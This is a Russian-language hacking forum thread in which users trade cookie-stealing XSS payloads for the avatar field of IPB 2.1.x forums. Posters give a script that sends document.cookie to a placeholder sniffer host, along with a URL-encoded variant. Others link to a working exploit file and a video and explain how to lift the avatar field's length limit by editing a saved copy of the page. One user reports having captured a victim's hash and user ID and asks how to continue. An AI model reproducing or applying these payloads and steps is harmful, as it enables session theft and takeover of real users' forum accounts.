не проходит этот скрипт HTML: <script> img = new Image(); img.src = "http://адресс_снифера?"+document.cookie; </script> форум http://no-links.com/
<script> img%20=%20new%20Image()%3B img.src%20=%20%22http://адрес?%22%3F+document.cookie%3B </script> сорри, забыл перекодировать но и такое тож не прохордит
Этот код все равно не сработает. Т.к. ты не зашифровал еще много чего... Вот мой рабочий Если IPB 2.1.4 то вот: http://dreamshell.h16.ru/hack/cookie_avatar_ipb.txt Если IPB 2.1.5 то ставь как аватару, предварительно убрав
Ввобще-то я в этой теме уже выкладывал видео на примере DamageLab: _http://dreamshell.h16.ru/hack/damagelab.rar
все просто...заходишь в свой профиль....--> сменить аватарку.....сохраняешь эту страницу у себя на компе....(файл сохранить как....)....открываешь эту страницу блокнотом....ближе к концу находишь надпись (по-русски) "Введите ссылку на файл Вашего аватара".....ниже видишь строчку.....maxLength=80.....вместо 80 делаешь 300, например, maxLength=300.....и сохраняешь файл....открываешь броузером и теперь у тебя стоит ограничение на 300 символов... для прописи кода тебе хватит сполна....
Здравствуйте, Принцип работы Xss через аватар понял. Но возникло два вопроса: 1. Как правильно написать подходящий под конкретный форум Xss? 2. После получения алерта как дальше быть? То есть интересует написание снифера и запуск скрипта. Буду рад, если поделитесь линками на статьи. Спасибо
[offtop] Вот очень хорошая статья от WJ... http://forum.antichat.ru/threadnav11807-1-10-xss.html Еще поищи на сайте\форуме ачата... [/offtop]
Такой вопрос: сделал все с авой, получил хэш код, айди юзверя (вообшем вся инфа на снифере), далее что? =/